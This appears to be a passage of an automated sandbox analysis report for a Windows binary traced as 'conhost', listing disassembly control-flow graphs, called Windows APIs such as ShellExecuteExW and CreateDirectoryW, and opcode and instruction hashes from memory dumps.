                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1799206407-0
                                                                                                                                                                                                                                          • Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                                                                                                                          • Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
                                                                                                                                                                                                                                          • SendMessageW.USER32(00008001,00000000,?), ref: 0040129F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DiskFreeMessageSendSpace
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 696007252-0
                                                                                                                                                                                                                                          • Opcode ID: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                                                                                                                          • Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 793 401b0b-401b1b 794 401b27-401b52 call 413cbd 793->794 795 401b1d-401b22 793->795 800 401b54 794->800 801 401b65-401b71 call 4014eb 794->801 796 401e65-401e68 795->796 802 401b56-401b60 call 412574 800->802 807 401e47-401e62 ??3@YAXPAX@Z call 412574 801->807 808 401b77-401b7c 801->808 809 401e64 802->809 807->809 808->807 810 401b82-401bb8 call 401403 call 4017c0 call 40143c ??3@YAXPAX@Z 808->810 809->796 820 401e2d-401e30 810->820 821 401bbe-401bdd 810->821 822 401e32-401e45 ??3@YAXPAX@Z call 412574 820->822 825 401bf8-401bfc 821->825 826 401bdf-401bf3 call 412574 ??3@YAXPAX@Z 821->826 822->809 829 401c03-401c08 825->829 830 401bfe-401c01 825->830 826->802 833 401c2a-401c2d 829->833 834 401c0a 829->834 832 401c30-401c47 830->832 832->826 838 401c49-401c6c 832->838 833->832 835 401c0c-401c12 834->835 839 401c14-401c25 call 412574 ??3@YAXPAX@Z 835->839 843 401c87-401c8d 838->843 844 401c6e-401c82 call 412574 ??3@YAXPAX@Z 838->844 839->802 846 401ca9-401cbb GetLocalTime SystemTimeToFileTime 843->846 847 401c8f-401c92 843->847 844->802 850 401cc1-401cc4 846->850 848 401c94-401c96 847->848 849 401c9b-401ca7 847->849 848->835 849->850 852 401cc6-401cd0 call 4039e7 850->852 853 401cdd-401ce4 call 40367d 850->853 852->839 858 401cd6-401cd8 852->858 857 401ce9-401cee 853->857 859 401cf4-401cf7 857->859 860 401e19-401e28 GetLastError 857->860 858->835 861 401cfd-401d07 ??2@YAPAXI@Z 859->861 862 401e0f-401e12 859->862 860->820 864 401d18 861->864 865 401d09-401d16 861->865 862->860 866 401d1a-401d3e call 41334e call 412468 864->866 865->866 871 401df4-401e0d call 4136b9 call 412574 866->871 872 401d44-401d62 GetLastError call 4013d1 call 4033bd 866->872 871->822 881 401d64-401d6b 872->881 882 401d9f-401db4 call 4039e7 872->882 885 401d6f-401d7f ??3@YAXPAX@Z 881->885 886 401dc0-401dd8 call 412468 882->886 887 401db6-401dbe 882->887 888 401d81-401d83 885->888 889 401d87-401d9a call 412574 ??3@YAXPAX@Z 885->889 895 401dda-401de9 GetLastError 886->895 896 401deb-401df3 ??3@YAXPAX@Z 886->896 887->885 888->889 889->802 895->885 896->871
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d2dfe2abf301309d362131bd93a747da233b6c9be4ce09f95f662486bda0cf4
                                                                                                                                                                                                                                          • Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d2dfe2abf301309d362131bd93a747da233b6c9be4ce09f95f662486bda0cf4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 898 41945f-4194d4 __set_app_type __p__fmode __p__commode call 4195eb 901 4194e2-419539 call 4195d6 _initterm __getmainargs _initterm 898->901 902 4194d6-4194e1 __setusermatherr 898->902 905 419575-419578 901->905 906 41953b-419543 901->906 902->901 907 419552-419556 905->907 908 41957a-41957e 905->908 909 419545-419547 906->909 910 419549-41954c 906->910 912 419558-41955a 907->912 913 41955c-41956d GetStartupInfoA 907->913 908->905 909->906 909->910 910->907 911 41954e-41954f 910->911 911->907 912->911 912->913 914 419580-419582 913->914 915 41956f-419573 913->915 916 419583-4195b0 GetModuleHandleA call 4074d5 exit _XcptFilter 914->916 915->916
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                                          • String ID: pA
                                                                                                                                                                                                                                          • API String ID: 801014965-794713698
                                                                                                                                                                                                                                          • Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                                                                                                                          • Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                                                                                                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                                                                                                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                                                                                                                                          • String ID: Static
                                                                                                                                                                                                                                          • API String ID: 2479445380-2272013587
                                                                                                                                                                                                                                          • Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                                                                                                                          • Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 949 414491-4144ac call 416606 952 4144bb-4144f9 call 407613 call 4136b9 949->952 953 4144ae-4144b8 949->953 958 4145c7-4145ed call 41424b call 414186 952->958 959 4144ff-414509 ??2@YAPAXI@Z 952->959 969 41460b-414623 call 4127e6 call 413cbd 958->969 970 4145ef-414605 call 413d98 958->970 960 414518 959->960 961 41450b-414516 959->961 964 41451a-414553 call 41334e ??2@YAPAXI@Z 960->964 961->964 971 414565 964->971 972 414555-414563 964->972 986 414625-414632 ??2@YAPAXI@Z 969->986 987 41465b-41466b 969->987 970->969 980 414787-41479e 970->980 973 414567-4145a0 call 41334e call 410320 call 414020 971->973 972->973 1001 4145a2-4145a4 973->1001 1002 4145a8-4145ad 973->1002 989 414a14-414a2f call 413d2a 980->989 990 4147a4 980->990 991 414634-41463b call 414270 986->991 992 41463d 986->992 1003 41469b-4146a1 987->1003 1004 41466d 987->1004 1009 414a31-414a37 989->1009 1010 414a3a-414a3d 989->1010 997 4147a7-4147da 990->997 993 41463f-41464f call 4136b9 991->993 992->993 1015 414651-414654 993->1015 1016 414656 993->1016 1021 414810-414828 997->1021 1022 4147dc-4147e5 997->1022 1001->1002 1012 4145b5-4145c1 1002->1012 1013 4145af-4145b1 1002->1013 1007 414775-414784 call 414419 1003->1007 1008 4146a7-4146c7 call 412958 1003->1008 1011 41466f-414695 call 412885 call 413d75 call 413edc call 413f0e 1004->1011 1007->980 1025 4146cc-4146d4 1008->1025 1009->1010 1010->1011 1019 414a43-414a6a call 41271d 1010->1019 1011->1003 1012->958 1012->959 1013->1012 1023 414658 1015->1023 1016->1023 1042 414a82-414a9e 1019->1042 1043 414a6c-414a80 call 416407 1019->1043 1038 4148e2-414925 call 41271d * 2 1021->1038 1039 41482e-414833 1021->1039 1028 4147eb-414800 1022->1028 1029 41497f-414981 1022->1029 1023->987 1031 414949-41494e 1025->1031 1032 4146da-4146e1 1025->1032 1046 414ab1-414ab3 1028->1046 1047 414806-414808 1028->1047 1045 414985-41498a 1029->1045 1036 414950-414952 1031->1036 1037 414956-41495b 1031->1037 1040 4146e3-4146e7 1032->1040 1041 41470f-414712 1032->1041 1036->1037 1050 414963-414966 1037->1050 1051 41495d-41495f 1037->1051 1084 414927-41492a 1038->1084 1085 41498f 1038->1085 1052 414ac3-414ac5 1039->1052 1053 414839-41484a 1039->1053 1040->1041 1055 4146e9-4146ec 1040->1055 1048 414978-41497d 1041->1048 1049 414718-414726 call 4136b9 1041->1049 1139 414a9f call 418583 1042->1139 1140 414a9f call 413bea 1042->1140 1141 414a9f call 402a2f 1042->1141 1043->1042 1045->1011 1060 414ab5-414ab7 1046->1060 1061 414abb-414abe 1046->1061 1047->1021 1065 41480a-41480c 1047->1065 1048->1029 1048->1045 1080 414733-414744 call 414020 1049->1080 1081 414728-41472e call 418e03 1049->1081 1050->1011 1051->1050 1070 414ac9-414ace 1052->1070 1082 414850-414882 call 402a67 call 40b2b0 1053->1082 1083 414ad3-414ae1 SysFreeString 1053->1083 1063 4146f2-414700 call 4136b9 1055->1063 1064 41496b-414970 1055->1064 1059 414aa2-414aac call 412885 1059->1011 1060->1061 1061->1011 1063->1080 1088 414702-41470d call 418dde 1063->1088 1064->1045 1074 414972-414974 1064->1074 1065->1021 1070->1011 1074->1048 1101 414746-414748 1080->1101 1102 41474c-414751 1080->1102 1081->1080 1111 414884-41488a 1082->1111 1112 41489a-4148b8 ??3@YAXPAX@Z 1082->1112 1086 414ae3-414ae5 1083->1086 1087 414ae9-414aeb 1083->1087 1093 41492d-414945 call 416407 1084->1093 1092 414992-414997 1085->1092 1086->1087 1087->1011 1088->1080 1097 414999-4149a5 call 413fb1 1092->1097 1098 4149df-414a0b call 412885 * 2 1092->1098 1115 414947 1093->1115 1117 4149b3-4149bf call 413ffc 1097->1117 1118 4149a7-4149b1 1097->1118 1098->997 1135 414a11 1098->1135 1101->1102 1106 414753-414755 1102->1106 1107 414759-41475e 1102->1107 1106->1107 1109 414760-414762 1107->1109 1110 414766-41476f 1107->1110 1109->1110 1110->1007 1110->1008 1116 41488c-414898 1111->1116 1124 414af0-414af7 ??3@YAXPAX@Z 1112->1124 1125 4148be-4148da ??3@YAXPAX@Z SysFreeString 1112->1125 1115->1092 1116->1112 1116->1116 1130 4149c5 1117->1130 1131 414af9-414b09 call 412885 * 2 1117->1131 1121 4149c8-4149dd call 416407 1118->1121 1121->1097 1121->1098 1124->1083 1125->1038 1129 4148dc-4148de 1125->1129 1129->1038 1130->1121 1131->1070 1135->989 1139->1059 1140->1059 1141->1059
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 00414501
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0041454B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: 97a8aa572a0e13242c78b64df3e25647ab512bad2699655ee8ca556d604462d2
                                                                                                                                                                                                                                          • Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97a8aa572a0e13242c78b64df3e25647ab512bad2699655ee8ca556d604462d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1193 4053b2-4053f7 call 4014eb * 2 memset 1198 405403-405407 1193->1198 1199 4053f9-4053fc 1193->1199 1200 405410-40542a call 404e9f call 401403 1198->1200 1201 405409 1198->1201 1199->1198 1206 405445-40545d ShellExecuteExW 1200->1206 1207 40542c-405434 ??3@YAXPAX@Z 1200->1207 1201->1200 1209 405485-405487 1206->1209 1210 40545f-405466 1206->1210 1208 405437-405444 ??3@YAXPAX@Z 1207->1208 1211 40547c-405483 ??3@YAXPAX@Z 1209->1211 1212 405473-405476 CloseHandle 1210->1212 1213 405468-40546d WaitForSingleObject 1210->1213 1211->1208 1212->1211 1213->1212
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004053D6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?), ref: 0040542F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00405437
                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00405455
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(004071CC,000000FF), ref: 0040546D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(004071CC), ref: 00405476
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040547D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2700081640-0
                                                                                                                                                                                                                                          • Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                                                                                                                          • Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1214 401e6b-401e7a CreateDirectoryW 1215 401eac-401eb0 1214->1215 1216 401e7c-401e89 GetLastError 1214->1216 1217 401e96-401ea3 GetFileAttributesW 1216->1217 1218 401e8b 1216->1218 1217->1215 1220 401ea5-401ea7 1217->1220 1219 401e8c-401e95 SetLastError 1218->1219 1220->1215 1221 401ea9-401eaa 1220->1221 1221->1219
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                                                                                                                          • String ID: a:@
                                                                                                                                                                                                                                          • API String ID: 635176117-3844204524
                                                                                                                                                                                                                                          • Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                                                                                                                          • Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1225 416891-4168ae call 413b40 1228 4168b4-4168bb call 4163a6 1225->1228 1229 4169e6-4169e9 1225->1229 1232 4168c4-4168f3 call 40b2b0 memcpy 1228->1232 1233 4168bd-4168bf 1228->1233 1236 4168f6-4168fe 1232->1236 1233->1229 1237 416900-41690e 1236->1237 1238 416916-41692e 1236->1238 1239 416910 1237->1239 1240 41698a-416993 ??3@YAXPAX@Z 1237->1240 1244 416930-416935 1238->1244 1245 416995 1238->1245 1239->1238 1241 416912-416914 1239->1241 1242 4169e4-4169e5 1240->1242 1241->1238 1241->1240 1242->1229 1247 416937-41693f 1244->1247 1248 41699a-41699d 1244->1248 1246 416997-416998 1245->1246 1249 4169dd-4169e2 ??3@YAXPAX@Z 1246->1249 1250 416941 1247->1250 1251 416973-416985 memmove 1247->1251 1248->1246 1249->1242 1252 416950-416954 1250->1252 1251->1236 1253 416956-416958 1252->1253 1254 416948-41694a 1252->1254 1253->1251 1255 41695a-416963 call 4163a6 1253->1255 1254->1251 1256 41694c-41694d 1254->1256 1259 416965-416971 1255->1259 1260 41699f-4169d5 memcpy call 412a6a 1255->1260 1256->1252 1259->1251 1261 416943-416946 1259->1261 1262 4169d8-4169db 1260->1262 1261->1252 1262->1249
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 004168E8
                                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 0041697F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0041698B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@memcpymemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3549172513-0
                                                                                                                                                                                                                                          • Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                                                                                                                          • Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1277 404d0b-404d8c #17 call 418f40 call 402427 call 40247d * 7 1296 404d91-404da5 SHGetSpecialFolderPathW 1277->1296 1297 404e3a-404e3e 1296->1297 1298 404dab-404df5 wsprintfW call 4014eb * 2 call 401403 * 2 call 4035cf 1296->1298 1297->1296 1300 404e44-404e48 1297->1300 1309 404dfa-404e00 1298->1309 1310 404e02-404e25 call 401403 * 2 call 4035cf 1309->1310 1311 404e2a-404e30 1309->1311 1310->1311 1311->1309 1313 404e32-404e35 call 402990 1311->1313 1313->1297
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                                                                                                                            • Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431
